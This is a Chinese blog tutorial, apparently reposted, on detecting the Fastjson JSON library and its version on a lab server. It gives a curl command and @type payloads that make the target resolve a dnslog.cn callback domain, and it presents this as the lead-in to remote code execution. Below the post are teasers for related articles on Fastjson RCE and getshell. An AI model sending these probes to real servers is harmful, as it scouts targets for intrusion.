Fastjson漏洞的识别与DNSlog回显

9月前作者：tpaer 分类：Toy博客阅读(48) 违法举报

这篇具有很好参考价值的文章主要介绍了Fastjson漏洞的识别与DNSlog回显。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

Fastjson的探测方式

模拟使用fastjson的网站 http://192.168.88.111:8090/

方式一

命令行

curl http://192.168.88.111:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"cegkgu.dnslog.cn"}:0'

识别特征：（出现则使用了Fastjson）

"status":500, "error":"Internal Server Error"

fastjson dnslog,从入门到入狱,json,网络安全,java,web安全,web

Bp
识别特征：（出现则使用了Fastjson）
type=Internal Server Error, status=500

fastjson dnslog,从入门到入狱,json,网络安全,java,web安全,web

方式二

通过DNSlog回显
fastjson dnslog,从入门到入狱,json,网络安全,java,web安全,web Bp

payload：识别1.2.67之前版本

{"tpa":{"@type":"java.net.Inet4Address","val":"cegkgu.dnslog.cn"}}

fastjson dnslog,从入门到入狱,json,网络安全,java,web安全,web
DNSLog成功回显

fastjson dnslog,从入门到入狱,json,网络安全,java,web安全,web payload：识别1.2.67之后版本

{"@type":"java.net.Inet4Address","val":"cegkgu.dnslog.cn"}

其他同理，若不在版本范围会出现特征type=Internal Server Error, status=500，说明该页面使用了Fastjson但版本不符没有识别到。

总结

payload有很多种，测试使用DNSlog回显的方式就可以，能识别出Fastjson版本，若在版本范围内就可以继续进行RCE攻击。文章来源地址https://www.toymoban.com/news/detail-599535.html

到了这里，关于Fastjson漏洞的识别与DNSlog回显的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

Fastjson漏洞复现

Fastjson简介 Fastjson 是阿里巴巴公司开源的一款 JSON 解析器，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 Java Bean 。历史漏洞 Fastjson 1.2.41 第一个Fastjson反序列化漏洞爆出后，阿里在1.2.25版本设置了 autoTypeSupport 属性默认

2024年02月10日
浏览(36)
Fastjson漏洞

Fastjson是阿里巴巴公司开源的一款json解析器，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到JavaBean。 Fastjson =1.2.24 反序列化远程命令执行漏洞 Fastjson =1.2.41 反序列化远程命令执行漏洞 Fastjson =1.2.42 反序列化远程命令执行漏

2024年02月11日
浏览(38)
Fastjson反序列化漏洞复现小结

简单来说：Fastjson是解析JSON格式的字符串的，允许用户在输入JSON串时通过“@type”键对应的value指定任意反序列化类名，进而执行类里的恶意代码。 1、Fastjson1.2.24远程代码执行（CNVD-2017-02833 ） 2、Fastjson=1.2.47远程代码执行漏洞（CNVD-2019-22238） 3、Fstjson =1.2.60 远程代码执行漏洞

2023年04月08日
浏览(48)
fastjson反序列化漏洞学习(一)

Fastjson 是阿里巴巴开源的一个 Java 的 JSON 解析库。它提供了快速、高效、简洁的 JSON 解析功能。Fastjson 不仅支持常见的 JSON 数据类型（如字符串、数字、布尔值、数组、对象等），还支持 Java 原生数据类型（如整型、浮点型、数组、集合等）与 JSON 之间的互相转换。Fastjson 支

2024年02月04日
浏览(48)
FastJson中AutoType反序列化漏洞

Fastjson1.2.80 反序列化漏洞情报，攻击者可以利用该漏洞攻击远程服务器, 可能会造成任意命令执行。在Fastjson=1.2.83的版本中，通过新的Gadgets链绕过autoType开关，在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制，实现了反序列化漏洞利用的远程代码执行效果，同时，此

2024年02月07日
浏览(49)
Fastjson反序列化漏洞原理与复现

Fastjson是java的一个库，可以将Java对象转化为json格式的字符串，也可以将json格式的字符串转化为Java对象。 Fastjson提供了 toJSONString() 和 parseObject() 方法来将Java对象与JSON相互转换。调用 toJSONString() 方法即可将对象转换成 JSON 字符串， parseObject() 方法则反过来将JSON字符串转换成

2024年02月12日
浏览(62)
Fastjson反序列化远程代码执行漏洞

据国家网络与信息安全信息通报中心监测发现，开源Java开发组件Fastjson存在反序列化远程代码执行漏洞。攻击者可利用上述漏洞实施任意文件写入、服务端请求伪造等攻击行为，造成服务器权限被窃取、敏感信息泄漏等严重影响。先贴一个解决漏洞的方案：不过任何升级一

2024年02月09日
浏览(45)
【java安全】FastJson反序列化漏洞浅析

0x00.前言前面我们学习了RMI和JNDI知识，接下来我们就可以来了解一下FastJson反序列化了 0x01.FastJson概述 FastJson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将JavaBean序列化为JSON字符串，也可以将JSON字符串反序列化到JavaBean 0x02.FastJson使用首先我们需要使用

2024年02月11日
浏览(52)
Tcsec安全研究院|fastjson漏洞分析

fastjson 是一个 Java 库，可用于将 Java 对象转换为其 JSON 表示形式。它还可以用于将 JSON 字符串转换为等效的 Java 对象。Fastjson 可以处理任意的 Java 对象，包括没有源代码的预先存在的对象。 java 的核心就是对象的操作，fastjson 同样遵循这个原则利用get、set操作对象。将 User 对

2024年02月13日
浏览(49)
渗透测试-Fastjson反序列化漏洞getshell

目录前言测试环境准备 dnslog测试搭建rmi服务器准备恶意类引用JdbcRowSetImpl攻击反弹shell$命令执行总结：fastjson 1.2.24反序列化导致任意命令执行漏洞注：本次渗透测试全在虚拟机中进行仅用于学习交流，请勿在实际网络中攻击他人服务器。前言最原始

2024年02月07日
浏览(60)